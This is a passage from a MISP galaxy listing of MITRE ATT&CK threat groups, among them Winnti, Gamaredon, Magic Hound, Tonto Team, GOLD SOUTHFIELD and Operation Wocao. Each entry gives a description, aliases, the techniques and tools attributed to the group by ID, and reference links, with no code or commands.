uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"

Table 4469. Table References
Links
https://attack.mitre.org/groups/G0038
https://citizenlab.org/2016/05/stealth-falcon/

Winnti Group - G0044

[Winnti Group](https://attack.mitre.org/groups/G0044) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015) Some reporting suggests a number of other groups, including [Axiom](https://attack.mitre.org/groups/G0001), [APT17](https://attack.mitre.org/groups/G0025), and [Ke3chang](https://attack.mitre.org/groups/G0004), are closely linked to [Winnti Group](https://attack.mitre.org/groups/G0044). (Citation: 401 TRG Winnti Umbrella May 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Winnti Group - G0044"

Winnti Group - G0044 is also known as:

Winnti Group
Blackfly

View relationships graph

Winnti Group - G0044 has relationships with:

similar: misp-galaxy:threat-actor="Aurora Panda" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="Axiom" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Winnti for Windows - S0141" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PipeMon - S0501" with estimative-language:likelihood-probability="almost-certain"

Table 4470. Table References
Links
https://attack.mitre.org/groups/G0044
https://securelist.com/winnti-more-than-just-a-game/37029/
https://securelist.com/games-are-over/70991/
http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf
https://401trg.com/burning-umbrella/
http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates

Gamaredon Group - G0047

[Gamaredon Group](https://attack.mitre.org/groups/G0047) is a threat group that has been active since at least 2013 and has targeted individuals likely involved in the Ukrainian government. The name [Gamaredon Group](https://attack.mitre.org/groups/G0047) comes from a misspelling of the word "Armageddon", which was detected in the adversary’s early campaigns.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Gamaredon Group - G0047"

Gamaredon Group - G0047 is also known as:

Gamaredon Group

View relationships graph

Gamaredon Group - G0047 has relationships with:

similar: misp-galaxy:threat-actor="Gamaredon Group" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Pteranodon - S0147" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internal Spearphishing - T1534" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"

Table 4471. Table References
Links
https://attack.mitre.org/groups/G0047
https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/
https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/
https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/

Magic Hound - G0059

[Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted U.S. and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.(Citation: FireEye APT35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Secureworks COBALT ILLUSION Threat Profile)(Citation: Proofpoint TA453 July2021)

The tag is: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059"

Magic Hound - G0059 is also known as:

Magic Hound
TA453
COBALT ILLUSION
Charming Kitten
ITG18
Phosphorus
Newscaster
APT35

View relationships graph

Magic Hound - G0059 has relationships with:

similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Pupy - S0192" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exchange Email Delegate Permissions - T1098.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="DownPaper - S0186" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1566.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials - T1589.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Accounts - T1585.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Accounts - T1586.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1598.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1584.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1585.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Gather Victim Identity Information - T1589" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Addresses - T1589.002" with estimative-language:likelihood-probability="almost-certain"

Table 4472. Table References
Links
https://attack.mitre.org/groups/G0059
https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf
https://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdf
https://blog.certfa.com/posts/charming-kitten-christmas-gift/
https://www.secureworks.com/research/threat-profiles/cobalt-illusion
https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453
https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/
https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credential
http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf
https://www.eweek.com/security/newscaster-threat-uses-social-media-for-intelligence-gathering
https://www.clearskysec.com/wp-content/uploads/2019/10/The-Kittens-Are-Back-in-Town-2-1.pdf
https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/
https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/
https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/
https://noticeofpleadings.com/phosphorus/files/Complaint.pdf

Stolen Pencil - G0086

[Stolen Pencil](https://attack.mitre.org/groups/G0086) is a threat group likely originating from DPRK that has been active since at least May 2018. The group appears to have targeted academic institutions, but its motives remain unclear.(Citation: Netscout Stolen Pencil Dec 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Stolen Pencil - G0086"

View relationships graph

Stolen Pencil - G0086 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
revoked-by: misp-galaxy:mitre-intrusion-set="Kimsuky - G0094" with estimative-language:likelihood-probability="almost-certain"

Table 4473. Table References
Links
https://attack.mitre.org/groups/G0086
https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/

Gorgon Group - G0078

[Gorgon Group](https://attack.mitre.org/groups/G0078) is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. (Citation: Unit 42 Gorgon Group Aug 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Gorgon Group - G0078"

Gorgon Group - G0078 is also known as:

Gorgon Group

View relationships graph

Gorgon Group - G0078 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Portable Executable Injection - T1055.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="QuasarRAT - S0262" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Remcos - S0332" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="NanoCore - S0336" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="njRAT - S0385" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4474. Table References
Links
https://attack.mitre.org/groups/G0078
https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/

Bouncing Golf - G0097

[Bouncing Golf](https://attack.mitre.org/groups/G0097) is a cyberespionage campaign targeting Middle Eastern countries.(Citation: Trend Micro Bouncing Golf 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Bouncing Golf - G0097"

Bouncing Golf - G0097 is also known as:

Bouncing Golf

View relationships graph

Bouncing Golf - G0097 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="GolfSpy - S0421" with estimative-language:likelihood-probability="almost-certain"

Table 4475. Table References
Links
https://attack.mitre.org/groups/G0097
https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/

Tonto Team - G0131

[Tonto Team](https://attack.mitre.org/groups/G0131) is a suspected Chinese state-sponsored cyber espionage threat group that has primarily targeted South Korea, Japan, Taiwan, and the United States since at least 2009; by 2020 they expanded operations to include other Asian as well as Eastern European countries. [Tonto Team](https://attack.mitre.org/groups/G0131) has targeted government, military, energy, mining, financial, education, healthcare, and technology organizations, including through the Heartbeat Campaign (2009-2012) and Operation Bitter Biscuit (2017).(Citation: Kaspersky CactusPete Aug 2020)(Citation: ESET Exchange Mar 2021)(Citation: FireEye Chinese Espionage October 2019)(Citation: ARS Technica China Hack SK April 2017)(Citation: Trend Micro HeartBeat Campaign January 2013)(Citation: Talos Bisonal 10 Years March 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Tonto Team - G0131"

Tonto Team - G0131 is also known as:

Tonto Team
Earth Akhlut
BRONZE HUNTLEY
CactusPete
Karma Panda

View relationships graph

Tonto Team - G0131 has relationships with:

uses: misp-galaxy:mitre-malware="ShadowPad - S0596" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Bisonal - S0268" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="LaZagne - S0349" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="gsecdump - S0008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="NBTscan - S0590" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"

Table 4476. Table References
Links
https://attack.mitre.org/groups/G0131
https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/
https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/
https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf
https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/
https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the-heartbeat-apt-campaign.pdf?
https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html
https://vb2020.vblocalhost.com/uploads/VB2020-06.pdf
https://www.secureworks.com/research/threat-profiles/bronze-huntley
https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/

GOLD SOUTHFIELD - G0115

[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2019 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)

The tag is: misp-galaxy:mitre-intrusion-set="GOLD SOUTHFIELD - G0115"

GOLD SOUTHFIELD - G0115 is also known as:

GOLD SOUTHFIELD

View relationships graph

GOLD SOUTHFIELD - G0115 has relationships with:

uses: misp-galaxy:mitre-malware="REvil - S0496" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compromise Software Supply Chain - T1195.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="ConnectWise - S0591" with estimative-language:likelihood-probability="almost-certain"

Table 4477. Table References
Links
https://attack.mitre.org/groups/G0115
https://www.secureworks.com/research/revil-sodinokibi-ransomware
https://www.secureworks.com/blog/revil-the-gandcrab-connection
https://www.secureworks.com/research/threat-profiles/gold-southfield

Operation Wocao - G0116

[Operation Wocao](https://attack.mitre.org/groups/G0116) described activities carried out by a China-based cyber espionage adversary. [Operation Wocao](https://attack.mitre.org/groups/G0116) targeted entities within the government, managed service providers, energy, health care, and technology sectors across several countries, including China, France, Germany, the United Kingdom, and the United States. [Operation Wocao](https://attack.mitre.org/groups/G0116) used similar TTPs and tools to APT20, suggesting a possible overlap.(Citation: FoxIT Wocao December 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Operation Wocao - G0116"

Operation Wocao - G0116 is also known as:

Operation Wocao

View relationships graph

Operation Wocao - G0116 has relationships with:

uses: misp-galaxy:mitre-tool="netstat - S0104" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PowerSploit - S0194" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Impacket - S0357" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
